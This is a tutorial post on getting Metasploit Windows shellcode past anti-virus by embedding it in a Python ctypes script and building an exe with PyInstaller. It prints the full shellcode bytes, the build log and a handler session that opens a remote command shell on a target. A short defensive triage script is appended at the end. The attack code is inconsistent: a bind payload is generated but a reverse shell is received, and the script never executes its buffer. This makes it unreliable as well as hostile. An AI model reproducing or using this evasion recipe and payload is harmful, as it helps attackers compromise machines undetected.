Metasploit - Tips for Evading Anti-Virus
There are many ways to get past anti-virus software. This post covers one of them: write a Python program that invokes shellcode, then use PyInstaller to compile that Python program into an exe.

Preparation (compiled under Windows XP):

Compiling a Python program to an exe requires the Python interpreter, the pywin32 library and PyInstaller (extract it directly to the C: drive). If errors appear during compilation, follow the messages to resolve them. Installation is not complicated and is not covered here.

https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz

Use Metasploit to generate the shellcode that the Python program below will use.
```
msf payload(shell_bind_tcp) > show options

Module options (payload/windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     0.0.0.0          no        The target address

msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...
```
Once preparation is complete, the Python source is as follows:
```python
from ctypes import *

# shellcode generated by Metasploit above, as a raw byte string
shellcode = '\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'

# copy the bytes into a ctypes buffer
memorywithshell = create_string_buffer(shellcode, len(shellcode))
```
Use PyInstaller to compile the Python file containing the shellcode. The commands are:
```
C:\PyInstaller-2.1\utils>python makespec.py --onefile --noconsole shellcode.py
wrote C:\PyInstaller-2.1\utils\shellcode.spec
now run pyinstaller.py to build the executable

C:\PyInstaller-2.1\utils>python build.py shellcode.spec
59 INFO: Testing for ability to set icons, version resources...
69 INFO: ... resource update available
79 INFO: UPX is not available.
109 INFO: Processing hook hook-os
259 INFO: Processing hook hook-time
259 INFO: Processing hook hook-cPickle
349 INFO: Processing hook hook-_sre
509 INFO: Processing hook hook-cStringIO
639 INFO: Processing hook hook-encodings
660 INFO: Processing hook hook-codecs
1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils
1171 INFO: checking Analysis
1171 INFO: building Analysis because out00-Analysis.toc non existent
1171 INFO: running Analysis out00-Analysis.toc
1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1171 WARNING: Assembly not found
1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe
1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1230 WARNING: Assembly not found
1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll
1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py
1381 INFO: Processing hook hook-os
1401 INFO: Processing hook hook-site
1421 INFO: Processing hook hook-encodings
1562 INFO: Processing hook hook-time
1562 INFO: Processing hook hook-cPickle
1661 INFO: Processing hook hook-_sre
1822 INFO: Processing hook hook-cStringIO
1961 INFO: Processing hook hook-codecs
2463 INFO: Processing hook hook-pydoc
2632 INFO: Processing hook hook-email
2713 INFO: Processing hook hook-httplib
2763 INFO: Processing hook hook-email.message
2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py
2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py
2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py
3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py
3043 INFO: Analyzing shellcode.py
3114 INFO: Hidden import 'codecs' has been found otherwise
3114 INFO: Hidden import 'encodings' has been found otherwise
3114 INFO: Looking for run-time hooks
3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd
3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd
3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd
3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd
3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd
3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd
3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd
3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll
3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt
3634 INFO: checking PYZ
3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
4815 INFO: checking PKG
4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4815 INFO: building PKG (CArchive) out00-PKG.pkg
6167 INFO: checking EXE
6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
6167 INFO: building EXE from out00-EXE.toc
6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe
```
After the build finishes, place shellcode.exe on the target host and run it; the handler receives the reverse shell.
```
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.107:4444
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.112
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\PyInstaller-2.1\utils>
```
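The two artefacts this workflow leaves behind are what a defender can key on: a Python source that hands a long hex-escaped byte string to ctypes, and an exe wrapped by the PyInstaller one-file bootloader. The triage script below is an added example, not code from the original post; the PyInstaller marker strings and the scoring thresholds are my assumptions, and the sample inputs are constructed (filler bytes, not shellcode).

```python
import re

# Indicators taken from the technique above: a Python source that embeds a long
# "\x.." byte string and hands it to ctypes. Thresholds are assumptions.
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){32,}')  # 32+ consecutive \x escapes
CTYPES_HINTS = ("from ctypes import", "import ctypes", "create_string_buffer",
                "VirtualAlloc", "CreateThread", "windll.kernel32")


def score_source(text):
    """Score a Python source string; returns (score, reasons)."""
    reasons = []
    m = HEX_RUN.search(text)
    if m:
        reasons.append("hex-escaped blob of %d bytes" % (len(m.group(0)) // 4))
    hits = [h for h in CTYPES_HINTS if h in text]
    if hits:
        reasons.append("ctypes usage: " + ", ".join(hits))
    return (2 if m else 0) + len(hits), reasons


# Strings carried by PyInstaller one-file bundles (assumed from PyInstaller's
# CArchive magic and bootloader). A match only says "built with PyInstaller";
# plenty of legitimate software is, so treat it as context, not a verdict.
PYI_MARKERS = (b"MEI\x0c\x0b\x0a\x0b\x0e", b"pyi-windows-manifest-filename", b"_MEIPASS2")


def is_pyinstaller_bundle(data):
    """True if the raw bytes of an executable carry a PyInstaller marker."""
    return any(mark in data for mark in PYI_MARKERS)


# Constructed samples: a loader-shaped script (filler bytes, not shellcode),
# a benign script, and a fake binary tail carrying the CArchive magic.
SUSPECT_SOURCE = ('from ctypes import *\nshellcode = "' + r'\x41' * 40 +
                  '"\nbuf = create_string_buffer(shellcode, len(shellcode))\n')
BENIGN_SOURCE = 'import os\nprint(os.getcwd())\n'
FAKE_BUNDLE = b"\x00" * 64 + b"MEI\x0c\x0b\x0a\x0b\x0e" + b"\x00" * 16

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_SOURCE), ("benign", BENIGN_SOURCE)):
        print(name, score_source(src))
    print("bundle:", is_pyinstaller_bundle(FAKE_BUNDLE))
```

Run it against extracted sources from a PyInstaller bundle (or any .py picked up by a host scanner); a high score on the source plus a PyInstaller marker on the exe reproduces exactly the combination this post builds.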
References:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/